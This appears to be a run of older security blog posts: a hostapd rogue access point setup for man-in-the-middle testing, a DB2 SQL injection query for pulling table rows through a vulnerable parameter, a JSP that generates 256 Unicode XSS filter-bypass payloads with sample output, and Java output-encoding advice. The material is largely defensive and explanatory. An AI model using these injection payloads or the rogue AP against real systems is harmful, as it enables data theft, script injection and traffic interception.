Once Ubuntu is installed and you have a wireless card that works, you need to install hostapd. It's the software that will make your VM act like an access point. You also need to create one NAT'ed network adaptor in the VirtualBox config. <b style="font-style: italic;">I could not get this to work correctly unless it was NAT'ed. </b>The Alfa drivers come with their own custom version of hostapd. If you are using the Alfa then proceed to the next section. If not, you should be able to get away with just running <i>sudo apt-get install hostapd</i>.<br />
<br />
<h3>Installing the Alfa Drivers (Skip this section if not using the Alfa)</h3>If you're using the wireless card mentioned above then you also need to install the drivers from the Alfa website. The drivers can be downloaded <a href="http://www.alfa.com.tw/in/front/bin/ptlist.phtml?Category=105397" target="_blank">here</a>. Once downloaded and unzipped you will need to build the driver.<br />
<span style="font-family: 'Courier New', Courier, monospace;">> cd [ALFA ROOT]/driver</span><br />
Unzip and untar the driver and cd into the created directory structure and run the following commands.<br />
<span style="font-family: 'Courier New', Courier, monospace;">>make</span><br />
<span style="font-family: 'Courier New', Courier, monospace;">>sudo make install</span><br />
<span style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Your driver should now be installed; to test it, reboot the machine and see if the Alfa can connect to the internet. In VirtualBox I had to create a USB filter so that the VM can see the device. This is pretty simple, and the Alfa shows up in the list when you click Add USB in the VirtualBox USB config.</span><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-8mbPlq_uBGc/T38hx-YSqVI/AAAAAAAACtA/Wj0bAdat4J0/s1600/AlfaUsb.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="218" src="http://2.bp.blogspot.com/-8mbPlq_uBGc/T38hx-YSqVI/AAAAAAAACtA/Wj0bAdat4J0/s320/AlfaUsb.jpg" width="320" /></a></div><span style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<h3><span style="font-family: Arial, Helvetica, sans-serif;">Install HostAp for Alfa</span></h3><div><span style="font-family: Arial, Helvetica, sans-serif;">The downloaded drivers include a custom hostapd that needs to be built to use this card. You need to run the following: </span></div><div><span style="font-family: 'Courier New', Courier, monospace;">> cd [ALFA ROOT] /wpa_supplicant_hostapd/</span></div><div><span style="font-family: 'Courier New', Courier, monospace;">> unzip wpa_supplicant_hostapd-0.8_rtw_20110524.zip</span></div><div><span style="font-family: 'Courier New', Courier, monospace;">> cd wpa_supplicant_hostapd-0.8</span></div><div><span style="font-family: 'Courier New', Courier, monospace;">> cd hostap</span></div><div><span style="font-family: 'Courier New', Courier, monospace;">> make</span></div><div><span style="font-family: 'Courier New', Courier, monospace;">> sudo make install</span></div><div><span style="font-family: 'Courier New', Courier, monospace;">> </span><span style="font-family: 'Courier New', Courier, monospace;">cd [ALFA ROOT] /wpa_supplicant_hostapd/</span><br />
<span style="font-family: 'Courier New', Courier, monospace;">> cp rtl_hostapd.conf ~/</span><br />
<span style="font-family: 'Courier New', Courier, monospace;">> cd ~</span><br />
<span style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<span style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<h3><span style="font-family: Arial, Helvetica, sans-serif;">Configure HostAp</span></h3></div><span style="font-family: Arial, Helvetica, sans-serif;">Now you're ready to start your AP. You can configure your access point in rtl_hostapd.conf, or in /etc/hostap/hostapd.conf if you're not using the Alfa drivers. In this file ensure that the interface is correct, change the ssid, and change the password. Below is an example of the only things I needed to configure.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<span style="font-family: 'Courier New', Courier, monospace;">interface=wlan0</span><br />
<span style="font-family: 'Courier New', Courier, monospace;">ctrl_interface=/var/run/hostapd</span><br />
<span style="font-family: 'Courier New', Courier, monospace;">ssid=MALLORY_VM</span><br />
<span style="font-family: 'Courier New', Courier, monospace;">wpa_passphrase=thisisatest</span><br />
<span style="font-family: 'Courier New', Courier, monospace;">channel=6</span><br />
<span style="font-family: 'Courier New', Courier, monospace;">wpa=2</span><br />
<span style="font-family: 'Courier New', Courier, monospace;">bridge=br0</span><br />
<span style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Run your access point by typing:</span><br />
<span style="font-family: 'Courier New', Courier, monospace;">> sudo hostapd ./rtl_hostapd.conf</span><br />
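<span style="font-family: Arial, Helvetica, sans-serif;">The settings above are the minimum hostapd needs, and a slip in them either keeps hostapd from starting (a passphrase outside 8 to 63 characters, a bad channel) or, worse, brings the AP up open if the wpa= line is missing. The checker below is an added example, not part of the post or of hostapd: it parses hostapd's key=value format and applies those limits, using the post's config as sample input and a constructed open-network config as the counter-example.</span><br />

```python
# The post's own rtl_hostapd.conf settings, embedded here as sample input.
SAMPLE_CONF = """\
interface=wlan0
ctrl_interface=/var/run/hostapd
ssid=MALLORY_VM
wpa_passphrase=thisisatest
channel=6
wpa=2
bridge=br0
"""

# Constructed counter-example (not from the post): no wpa= line at all,
# so the AP would come up open, plus a channel hostapd will reject.
WEAK_CONF = """\
# open AP, no WPA at all
interface=wlan0
ssid=MALLORY_VM
channel=15
"""

REQUIRED_KEYS = ("interface", "ssid", "channel")


def parse_hostapd_conf(text):
    """Parse hostapd's key=value format into a dict.

    Blank lines and '#' comments are skipped; a key given twice keeps
    its last value, which is how hostapd treats most options.
    """
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, sep, value = line.partition("=")
        if sep:
            conf[key.strip()] = value.strip()
    return conf


def check_hostapd_conf(text):
    """Return a list of problems; an empty list means the config is usable."""
    conf = parse_hostapd_conf(text)
    problems = []
    for key in REQUIRED_KEYS:
        if key not in conf:
            problems.append(f"missing required key: {key}")
    ssid = conf.get("ssid", "")
    if ssid and not 1 <= len(ssid.encode("utf-8")) <= 32:
        problems.append("ssid must be 1..32 bytes")
    # 2.4 GHz channels only (the post uses channel 6); channel=0, which
    # newer hostapd treats as automatic selection, is rejected here.
    channel = conf.get("channel")
    if channel is not None and not (channel.isdigit() and 1 <= int(channel) <= 14):
        problems.append("channel must be 1..14 for a 2.4 GHz (hw_mode g) AP")
    # wpa is a bitfield: 1 = WPA, 2 = WPA2 (RSN), 3 = both, 0/unset = open.
    wpa = conf.get("wpa", "0")
    if wpa not in ("1", "2", "3"):
        problems.append("wpa is unset or 0: the AP would be open, and every client "
                        "in range could join it")
    else:
        psk = conf.get("wpa_passphrase")
        if psk is None:
            problems.append("wpa set but no wpa_passphrase")
        elif not 8 <= len(psk) <= 63:
            problems.append("wpa_passphrase must be 8..63 characters "
                            "(hostapd refuses to start otherwise)")
        if wpa != "2":
            problems.append("wpa=1 or wpa=3 allows WPA1/TKIP clients; use wpa=2")
    return problems


if __name__ == "__main__":
    for name, conf in (("post config", SAMPLE_CONF), ("weak config", WEAK_CONF)):
        print(name, check_hostapd_conf(conf) or ["ok"])
```

<span style="font-family: Arial, Helvetica, sans-serif;">Run check_hostapd_conf(open("rtl_hostapd.conf").read()) before starting hostapd; an empty list is the only result you want from a box that is about to advertise an SSID to everything in range.</span><br />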
<span style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">You should be able to see your wireless access point show up on your mobile devices. In Part 2 we will discuss the installation of Mallory and getting it to MiTM any device that connects to the wireless AP.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br />
</span>Unknownnoreply@blogger.com3tag:blogger.com,1999:blog-2410549130005981530.post-43482169844436924382011-09-13T09:48:00.001-05:002011-09-13T09:48:12.516-05:00DB2 SQL Injection : Select the Nth row without cursors<p>Well, I've looked all over the net for this solution and could not find the answer, so after much trial and error I built my own. Let's say you need to query one row at a time from DB2, you cannot use cursors, and specifically you need to query sysibm.systables. I came up with this solution; there may be a more elegant way, but this worked.</p> <blockquote> <p><font color="#0000ff" face="Courier New">select * from ( <br />        select * from systables order by name asc fetch first 1 rows only <br />) as G order by name desc fetch first 1 rows only</font></p> <p><font color="#0000ff" face="Courier New">select * from ( <br />        select * from systables order by name asc fetch first 2 rows only <br />) as G order by name desc fetch first 1 rows only</font></p> <p><font color="#0000ff" face="Courier New">select * from ( <br />        select * from systables order by name asc fetch first 3 rows only <br />) as G order by name desc fetch first 1 rows only</font></p> <p><font color="#0000ff" face="Courier New">...</font></p> <p><font color="#0000ff" face="Courier New">...</font></p> <p><font color="#0000ff" face="Courier New">select * from ( <br />        select * from systables order by name asc fetch first 1000 rows only <br />) as G order by name desc fetch first 1 rows only</font></p> </blockquote> <p>I put the query below into a vulnerable parameter sent to a website and used Burp Intruder to iterate through each row by incrementing N.</p> <blockquote> <p><font color="#0000ff" face="Courier New">select * from ( <br />        select * from systables order by name asc fetch first <strong><font color="#ff0000">N</font></strong> rows only <br 
/>) as G order by name desc fetch first 1 rows only</font></p> </blockquote> <p><font color="#000000" face="Arial">The query works by first requesting the first N rows ordered ascending, which puts the Nth row at the bottom of the result set. The outer query then orders that result set descending, so the Nth row is now at the top, and fetches the first row. The result set therefore returns the Nth row you need without having to define cursors. </font></p> <p><font color="#000000" face="Arial"><a href="http://lh3.ggpht.com/-aibnTYqBtE0/Tm9tKT9KNPI/AAAAAAAACjA/jIPmCeDYqpg/s1600-h/burp%252520intrude1%25255B4%25255D.jpg"><img style="background-image: none; border-bottom: 0px; border-left: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top: 0px; border-right: 0px; padding-top: 0px" title="burp intrude1" border="0" alt="burp intrude1" src="http://lh6.ggpht.com/-c7oogpIAGAM/Tm9tK98HSYI/AAAAAAAACjE/LMCEPJXfAj8/burp%252520intrude1_thumb%25255B2%25255D.jpg?imgmax=800" width="765" height="615" /></a></font></p> <p><font color="#000000" face="Arial"> </font></p> Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2410549130005981530.post-12995211231158275192011-04-28T17:10:00.000-05:002011-04-28T17:10:06.596-05:00Hacking 101 with Tracer-T<div class="separator" style="clear: both; text-align: center;"><object width="320" height="266" class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://3.gvt0.com/vi/SXmv8quf_xM/0.jpg"><param name="movie" value="http://www.youtube.com/v/SXmv8quf_xM&fs=1&source=uds" /><param name="bgcolor" value="#FFFFFF" /><embed width="320" height="266" src="http://www.youtube.com/v/SXmv8quf_xM&fs=1&source=uds" type="application/x-shockwave-flash"></embed></object></div>This makes me laugh every time I watch it. 
I still cannot figure out if the kid is joking or serious.Unknownnoreply@blogger.com7tag:blogger.com,1999:blog-2410549130005981530.post-32344087732433800972011-03-27T22:21:00.001-05:002011-03-29T00:30:17.949-05:00Roku hidden features.<p>I finally bought a Roku device today and immediately went looking for development resources. I was surprised to find they have an SDK you can download for free, and you don’t need to pay anything to distribute your app as long as you’re distributing it for free. You can easily put your device into ‘Development Mode’, which lets you upload code directly to the device through an HTTP interface and also enables a telnet port through which you can step through and debug the code. I think it’s great that you have the option to run the code locally on your own device, create a private channel so that only a select few can see it, or make it public (i.e. everyone in the world). I’m still new to this, but I can’t help but wonder what their app review process is like to ensure malware-like apps are not being distributed; I’ll get more into that at a later date.</p> <p>All of this is cool and I can’t wait to make my own channel, but the other really cool trick it can do is act as a network sniffer! It has the option to enable tcpdump, which will cycle through up to 4 dump files. These are all available via its web interface. This could be fun just to leave running for a few days to see what turns up. </p> <p>Be forewarned, there doesn’t seem to be any security around this stuff once it’s enabled, though. 
No password is required to access any of these features once they are enabled, but you must use the remote to enable them. It’s like putting in the cheat codes to old Nintendo games. UP,UP,DN,DN, Left,Right,Left,Right, B,A…. </p> <p>The channel code is written in BrightScript, which is completely new to me. It looks a lot, well exactly, like VBScript. I have never been a big fan of languages that don’t end lines in semicolons, probably because I started learning programming in C. I was actually kinda expecting something more Java-like. That was more wishful thinking on my part, I guess.</p> <p>Since it’s got tcpdump built into it, let’s see if I can port RADAR over to it. :P</p> Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2410549130005981530.post-2913722474592848482011-03-25T02:12:00.002-05:002011-03-25T15:11:40.057-05:00Hack Like in the Movies… with RADAR I have just started a new (possibly open source) project/experiment to perform 3D modeling of network traffic and networking events in near real time. My idea was to give users freedom of movement similar to a first-person shooter (WASD controls) and the ability to better visualize how attacks interact with the network. Some things are just more apparent when you have a different view. <br />
<h3>Introducing RADAR</h3>RADAR is written in Java using OpenGL so that it should be easy to port to any system. It has a built-in network sniffer and, currently, only nmap integration. It listens to network traffic and animates information about all devices it finds on the network, including open ports, whois, HTTP requests/responses, etc. When complete it will have the ability to record, play back, pause, rewind, and slow down these events in the animation. <br />
RADAR represents all IP devices as 3D orbs and places them in rings that roughly represent subnets; at this point anything that matches the first two octets goes into a ring group (this may be refined later on). All orbs can be clicked to display detailed information about what’s communicating with the host. It displays a parsed view of the pcap data by row, and when a row is selected a view of the actual hexdump is visible. This is better explained by the video below.<br />
<a href="http://www.youtube.com/watch?v=kaQR58XC7qk" target="_new"><img alt="" src="http://lh4.ggpht.com/_acrzuhZS74A/TYxAVdpW_-I/AAAAAAAACU0/tKPhtP7Hx98/video3e2f6aef6499%5B3%5D.jpg?imgmax=800" style="border-style: none;" /></a><h3>Download Coming Soon…</h3>As soon as I feel comfortable with it I will release a version that any of you out there can try out.Unknownnoreply@blogger.com7tag:blogger.com,1999:blog-2410549130005981530.post-53470086510892601972008-12-17T00:22:00.006-06:002008-12-17T01:05:10.024-06:00WebLogic and Non-English Character Sets<p>I want to discuss in more depth the vulnerability <a href="http://coding-insecurity.blogspot.com/">Matt Presson</a> and I have been working on. Apparently if you have a WebLogic server and you accept international characters but have the page encoding set to ISO 8859-1, then you are vulnerable to a whole mess of XSS attacks, and any script listed in my previous blog post will execute. What seems to happen (we are still trying to find the exact cause) is that the web server truncates the upper bytes when returning the request. 
So if you entered 0x013C the response will contain 0x3C, which is of course '<' and freakin' vulnerable ;) This gets past the default output encoding done by <bean:write, which uses the function <strong>ResponseUtils.filter()</strong> for all of its output encoding. If you use <b>StringEscapeUtils.escapeHtml()</b> from <a href="http://commons.apache.org/lang/">Apache Commons Lang</a> then all your output will be encoded correctly, as demonstrated by the war file Matt Presson released.</p> <p>I also modified Matt's code so that the regular POST is also vulnerable. The ajax POST was vulnerable because it called encodeURIComponent from JavaScript. If you set the form to <strong>accept-charset="UTF-8" </strong>then the data will be encoded the same way as with <strong>encodeURIComponent</strong>.</p> <pre> <form name="dataForm" id="form" method="POST" action="/International/execute/Display" accept-charset="UTF-8"></pre><br /><br /><p>Below is a video of the attack being exploited both in ajax and in a regular POST.</p><br /><embed id="VideoPlayback" src="http://video.google.com/googleplayer.swf?docid=-7065727101541575347&hl=en&fs=true" style="width:400px;height:326px" allowFullScreen="true" allowScriptAccess="always" type="application/x-shockwave-flash"> </embed><br /><p>I have currently tested this on Tomcat and GlassFish and was unable to get the same results, so it seems to primarily be a WebLogic issue. 
</p><br /><p>I would like to thank Gareth Heyes for giving me a hacker tag in <a href="http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php">hackvertor</a> to perform this exploit!</p>Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-2410549130005981530.post-45893789054173234862008-10-23T11:40:00.003-05:002008-10-23T23:08:28.485-05:00Why not to use Blacklists.<p>I was looking at Matt Presson's blog article about executing scripts with foreign char sets and decided to write my own JSP to generate every XSS that could be executed with foreign characters. This is a perfect example of why not to use blacklists. A simple whitelist or, better, proper output encoding (mentioned in my last post) will thwart these attempts.</p> <blockquote> <p><font color="#004080"><%@ page language="java" contentType="text/html; charset=UTF-8" <br />    pageEncoding="UTF-8"%> <br /><%@page import="org.apache.commons.lang.StringEscapeUtils" %> <br /><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <br /><html> <br /><head> <br /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <br /><title>Insert title here</title> <br /></head> <br /><body> <br /><% <br />for(long i=0; i< 0x100; i++) <br />{ <br />    long lt = 0x3C; <br />    long gt = 0x3E; <br />    long order = i << 8; <br />    long LT = order | lt; <br />    //out.println(Long.toHexString(LT) + " : "); <br />    long GT = order | gt; <br />    //out.println(Long.toHexString(GT) + "<BR>"); <br />    String theScript = (char)LT + "script" + (char)GT + "alert(" + i + ");" +(char)LT + "/script" + (char)GT; <br />    out.println( theScript + "<br>"); <br />} </font></p> <p><font color="#004080">%> <br /></body> <br /></html></font></p> <p> </p> </blockquote> <p>This will generate 256 different versions of JavaScript to bypass blacklist input 
validation attempts. Here are a few examples. They may not display properly on this blog, so I recommend running it on your own Tomcat server.</p> <blockquote> <p>ļscriptľalert(1);ļ/scriptľ <br />ȼscriptȾalert(2);ȼ/scriptȾ <br />̼script̾alert(3);̼/script̾ <br />мscriptоalert(4);м/scriptо <br />ԼscriptԾalert(5);Լ/scriptԾ <br />ؼscriptؾalert(6);ؼ/scriptؾ <br />ܼscriptܾalert(7);ܼ/scriptܾ <br />࠼script࠾alert(8);࠼/script࠾ <br />़scriptाalert(9);़/scriptा <br />਼scriptਾalert(10);਼/scriptਾ <br />଼scriptାalert(11);଼/scriptା <br />఼scriptాalert(12);఼/scriptా <br />഼scriptാalert(13);഼/scriptാ <br />scriptalert(14);/script <br />༼script༾alert(15);༼/script༾ <br />ြscriptှalert(16);ြ/scriptှ <br />ᄼscriptᄾalert(17);ᄼ/scriptᄾ <br />ሼscriptሾalert(18);ሼ/scriptሾ <br />ጼscriptጾalert(19);ጼ/scriptጾ <br />ᐼscriptᐾalert(20);ᐼ/scriptᐾ <br />ᔼscriptᔾalert(21);ᔼ/scriptᔾ <br />ᘼscriptᘾalert(22);ᘼ/scriptᘾ <br />scriptalert(23);/script <br />ᠼscriptᠾalert(24);ᠼ/scriptᠾ <br />scriptalert(25);/script <br />ᨼscriptᨾalert(26);ᨼ/scriptᨾ <br />ᬼscriptᬾalert(27);ᬼ/scriptᬾ <br />᰼script᰾alert(28);᰼/script᰾ <br />ᴼscriptᴾalert(29);ᴼ/scriptᴾ <br />ḼscriptḾalert(30);Ḽ/scriptḾ <br />ἼscriptἾalert(31);Ἴ/scriptἾ <br />‼script‾alert(32);‼/script‾ <br />ℼscriptℾalert(33);ℼ/scriptℾ <br />∼script∾alert(34);∼/script∾ </p></blockquote> Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2410549130005981530.post-31837636891401431172008-10-20T15:42:00.005-05:002008-10-23T23:09:27.829-05:00What do you mean no Java output encoding !!!<p>I hear all the time that Java does not have any good encoding libraries, but I have used some frameworks that do seem to encode the output properly. If anyone uses the Struts framework and implements it properly, then all your output is encoded properly as long as you use the following methods to output data. 
</p> <p> </p> <blockquote> <table border="0" cellspacing="0" cellpadding="2" width="636"><tbody> <tr> <td valign="top" width="634"> <p><bean:write name="secData" property="username"/><br> <br />    <html:link href="./test.jsp" paramId="test" paramName="secData" paramProperty="username" > <bean:write name="secData" property="username"/></html:link><br> <br />    <html:hidden name="secData" property="username" /> <br></p> </td> </tr> </tbody></table> </blockquote> <p>The tag libraries bean:write, html:hidden, and html:link all encode their output: html:link (which creates an anchor tag) and html:hidden URL-encode it, while bean:write entity-encodes it. </p> <p> </p> <p><strong>What if you're not using Struts, you ask?</strong></p> <p>Well, this is great if you are using Struts 1 or Struts 2 (the output tags are different for Struts 2), but what if you are not, or you are writing servlets that generate HTML dynamically? This is not a problem. I dug a little deeper into Struts to see what it was doing and whether there is a way to leverage this for other sites that do not use the framework. The URL encoding is simply URLEncoder.encode(your string, your format). It uses a standard Java class that has been around since 1.5. Just import java.net.URLEncoder. </p> <p> </p> <p><em>Example:</em></p> <p>String output = URLEncoder.encode("your String" , "UTF-8");</p> <p>  </p> <p>Struts 1 uses an entity encoder built specifically into the Struts framework. The entity encoding is done by a Struts class called ResponseUtils, so you could import this class and still not use the Struts MVC architecture. </p> <p><em>Example:</em> </p> <p>String output = org.apache.struts.util.ResponseUtils.filter("your string");</p> <p> </p> <p>Struts 2 does entity encoding using the class TextUtils from WebWork. 
import org.opensymphony.xwork2.util.TextUtils</p> <p><em>Example:</em></p> <p>String output = org.opensymphony.xwork2.util.TextUtils.htmlEncode("your string", true);</p> <p> </p> <p><strong>Proper Encoding with international Chars!!!!</strong></p> <p>There are other encoding options provided by the Apache Commons Lang library. This library is probably the most useful. To get it to properly encode international chars to the screen you need to first unescape the HTML before escaping it: import org.apache.commons.lang.StringEscapeUtils;</p> <p> </p> <p><em>Example:</em></p> <p>String Output = StringEscapeUtils.escapeHtml(StringEscapeUtils.unescapeHtml(input));</p> <p> </p> <p>Below is an example screenshot of all the above encodings in a simple servlet. Notice that StringEscapeUtils (the last one) will properly encode the XSS attempt plus the Chinese character set. This will solve the problem all you Java developers have with output encoding international characters, and you can quit complaining that there aren't any good encoding options for Java. =) My source code is attached here: <a title="http://my-security-projects.googlecode.com/files/testEncoding.war" href="http://my-security-projects.googlecode.com/files/testEncoding.war">http://my-security-projects.googlecode.com/files/testEncoding.war</a> </p> <p> </p> <p>I hope this finally answers everyone's concerns about international character encoding in Java. I'll let you all out there in the hacker community see if you can find a way to get past this model. 
Let me know if you do</p> <p> </p> <p><a href="http://lh5.ggpht.com/ascetik/SPztQ8aNRHI/AAAAAAAAA-w/brWmclt75ac/s1600-h/image%5B12%5D.png"><img style="border-right-width: 0px; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" border="0" alt="image" src="http://lh4.ggpht.com/ascetik/SPztSeJiAYI/AAAAAAAAA-0/eCe2yyYhuNY/image_thumb%5B8%5D.png?imgmax=800" width="1244" height="856" /></a> </p> <p> </p> <p>Here is the page source:</p> <blockquote> <br /><table border="0" cellspacing="0" cellpadding="2" width="400"><tbody> <tr> <td valign="top" width="400"> <font color="#800000"><html><body></font> <br /> <font color="#800000"><h1> Servlet Test </h1></font> <br /> <font color="#800000"><br><b>Input String: </b> <strong><font color="#ff0000"><script>alert('xss');</script></font></strong> &#29615;&#29699;&#32463;&#27982;&#19981;&#26223;</font> <br /> <font color="#800000">&#27668;&#20013;&#22269;&#32463;&#27982;&#22686;&#38271;&#25918;&#32531; &#20013;&#22269;&#32463;&#27982;</font> <br /> <font color="#800000">&#22312;&#29615;&#29699;&#19981;&#26223;&#27668;&#19979;&#21576;&#29616;&#25918;&#32531;&#24577;&#21183;</font> <br /> <font color="#800000">&#65292;&#26368;&#26032;&#22269;&#20869;&#29983;&#20135;&#24635;&#20540;&#22686;&#38271;&#20026;9.9%&#65292;</font> <br /> <font color="#800000">&#36890;&#32960;&#25345;&#32493;&#25918;&#32531;&#12290; &#20013;&#22269;&#20061;&#26376;&#36152;&#26131;</font> <br /> <font color="#800000">&#30408;&#20313;&#21019;&#32426;&#24405; &#35775;&#35848;&#65306;&#20013;&#22269;&#22806;&#36152;&#21069;</font> <br /> <font color="#800000">&#26223;&#19981;&#23481;&#20048;&#35266; &#37329;&#34701;&#39118;&#26292;&#65306;&#20013;&#22269;&#38754;</font> <br /> <font color="#800000">&#20020;&#30340;&#21361;&#26426;&#19982;&#26426;&#36935; </font> <br /> <font color="#800000"><br></font> <br /> <font color="#800000"><b>java.net.URLEncoded: </b><strong><font 
color="#ff0000">%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E</font></strong>+++</font> <br /> <font color="#800000">%26%2329615%3B%26%2329699%3B%26%2332463%3B%26%2327982%3B%26%2319981%3B%26%2326223%3B</font> <br /> <font color="#800000">%26%2327668%3B%26%2320013%3B%26%2322269%3B%26%2332463%3B%26%2327982%3B%26%2322686%3B</font> <br /> <font color="#800000">%26%2338271%3B%26%2325918%3B%26%2332531%3B+%26%2320013%3B%26%2322269%3B%26%2332463</font> <br /> <font color="#800000">%3B%26%2327982%3B%26%2322312%3B%26%2329615%3B%26%2329699%3B%26%2319981%3B%26%2326223</font> <br /> <font color="#800000">%3B%26%2327668%3B%26%2319979%3B%26%2321576%3B%26%2329616%3B%26%2325918%3B%26%2332531</font> <br /> <font color="#800000">%3B%26%2324577%3B%26%2321183%3B%26%2365292%3B%26%2326368%3B%26%2326032%3B%26%2322269</font> <br /> <font color="#800000">%3B%26%2320869%3B%26%2329983%3B%26%2320135%3B%26%2324635%3B%26%2320540%3B%26%2322686</font> <br /> <font color="#800000">%3B%26%2338271%3B%26%2320026%3B9.9%25%26%2365292%3B%26%2336890%3B%26%2332960%3B%26</font> <br /> <font color="#800000">%2325345%3B%26%2332493%3B%26%2325918%3B%26%2332531%3B%26%2312290%3B+%26%2320013%3B</font> <br /> <font color="#800000">%26%2322269%3B%26%2320061%3B%26%2326376%3B%26%2336152%3B%26%2326131%3B%26%2330408</font> <br /> <font color="#800000">%3B%26%2320313%3B%26%2321019%3B%26%2332426%3B%26%2324405%3B+%26%2335775%3B%26</font> <br /> <font color="#800000">%2335848%3B%26%2365306%3B%26%2320013%3B%26%2322269%3B%26%2322806%3B%26%2336152%3B%26</font> <br /> <font color="#800000">%2321069%3B%26%2326223%3B%26%2319981%3B%26%2323481%3B%26%2320048%3B%26%2335266%3B+</font> <br /> <font color="#800000">%26%2337329%3B%26%2334701%3B%26%2339118%3B%26%2326292%3B%26%2365306%3B%26%2320013%3B</font> <br /> <font color="#800000">%26%2322269%3B%26%2338754%3B%26%2320020%3B%26%2330340%3B%26%2321361%3B%26%2326426%3B</font> <br /> <font color="#800000">%26%2319982%3B%26%2326426%3B%26%2336935%3B+</font> <br /> <font 
color="#800000"><br></font> <br /> <font color="#800000"><b>(apache commons lang) org.apache.commons.lang.StringEscapeUtils: </b><font color="#ff0000">&lt;script&gt;alert('xss');&lt;/script&gt;</font> </font> <br /> <font color="#800000">&amp;#29615;&amp;#29699;&amp;#32463;&amp;#27982;&amp;#19981;&amp;#26223;&amp;#27668;&amp;#20013;&amp;#22269;&amp;#32463;</font> <br /> <font color="#800000">&amp;#27982;&amp;#22686;&amp;#38271;&amp;#25918;&amp;#32531; &amp;#20013;&amp;#22269;&amp;#32463;&amp;#27982;&amp;#22312;</font> <br /> <font color="#800000">&amp;#29615;&amp;#29699;&amp;#19981;&amp;#26223;&amp;#27668;&amp;#19979;&amp;#21576;&amp;#29616;&amp;#25918;&amp;#32531;</font> <br /> <font color="#800000">&amp;#24577;&amp;#21183;&amp;#65292;&amp;#26368;&amp;#26032;&amp;#22269;&amp;#20869;&amp;#29983;&amp;#20135;&amp;#24635;</font> <br /> <font color="#800000">&amp;#20540;&amp;#22686;&amp;#38271;&amp;#20026;9.9%&amp;#65292;&amp;#36890;&amp;#32960;&amp;#25345;&amp;#32493;&amp;#25918;</font> <br /> <font color="#800000">&amp;#32531;&amp;#12290; &amp;#20013;&amp;#22269;&amp;#20061;&amp;#26376;&amp;#36152;&amp;#26131;&amp;#30408;&amp;#20313;</font> <br /> <font color="#800000">&amp;#21019;&amp;#32426;&amp;#24405; &amp;#35775;&amp;#35848;&amp;#65306;&amp;#20013;&amp;#22269;&amp;#22806;&amp;#36152;</font> <br /> <font color="#800000">&amp;#21069;&amp;#26223;&amp;#19981;&amp;#23481;&amp;#20048;&amp;#35266; &amp;#37329;&amp;#34701;&amp;#39118;&amp;#26292;</font> <br /> <font color="#800000">&amp;#65306;&amp;#20013;&amp;#22269;&amp;#38754;&amp;#20020;&amp;#30340;&amp;#21361;&amp;#26426;&amp;#19982;&amp;#26426;</font> <br /> <font color="#800000">&amp;#36935; </font> <br /> <font color="#800000"><br></font> <br /> <font color="#800000"><b>(struts-core-1.3.8.jar) org.apache.struts.util.ResponseUtils: </b><strong><font color="#ff0000">&lt;script&gt;alert(&#39;xss&#39;);&lt;/script&gt;</font></strong> </font> <br /> <font 
color="#800000">&amp;#29615;&amp;#29699;&amp;#32463;&amp;#27982;&amp;#19981;&amp;#26223;&amp;#27668;&amp;#20013;&amp;#22269;&amp;#32463;</font> <br /> <font color="#800000">&amp;#27982;&amp;#22686;&amp;#38271;&amp;#25918;&amp;#32531; &amp;#20013;&amp;#22269;&amp;#32463;&amp;#27982;&amp;#22312;</font> <br /> <font color="#800000">&amp;#29615;&amp;#29699;&amp;#19981;&amp;#26223;&amp;#27668;&amp;#19979;&amp;#21576;&amp;#29616;&amp;#25918;&amp;#32531;</font> <br /> <font color="#800000">&amp;#24577;&amp;#21183;&amp;#65292;&amp;#26368;&amp;#26032;&amp;#22269;&amp;#20869;&amp;#29983;&amp;#20135;&amp;#24635;</font> <br /> <font color="#800000">&amp;#20540;&amp;#22686;&amp;#38271;&amp;#20026;9.9%&amp;#65292;&amp;#36890;&amp;#32960;&amp;#25345;&amp;#32493;&amp;#25918;</font> <br /> <font color="#800000">&amp;#32531;&amp;#12290; &amp;#20013;&amp;#22269;&amp;#20061;&amp;#26376;&amp;#36152;&amp;#26131;&amp;#30408;&amp;#20313;</font> <br /> <font color="#800000">&amp;#21019;&amp;#32426;&amp;#24405; &amp;#35775;&amp;#35848;&amp;#65306;&amp;#20013;&amp;#22269;&amp;#22806;&amp;#36152;</font> <br /> <font color="#800000">&amp;#21069;&amp;#26223;&amp;#19981;&amp;#23481;&amp;#20048;&amp;#35266; &amp;#37329;&amp;#34701;&amp;#39118;&amp;#26292;</font> <br /> <font color="#800000">&amp;#65306;&amp;#20013;&amp;#22269;&amp;#38754;&amp;#20020;&amp;#30340;&amp;#21361;&amp;#26426;&amp;#19982;&amp;#26426;</font> <br /> <font color="#800000">&amp;#36935; </font> <br /> <font color="#800000"><br></font> <br /> <font color="#800000"><b>(xwork) 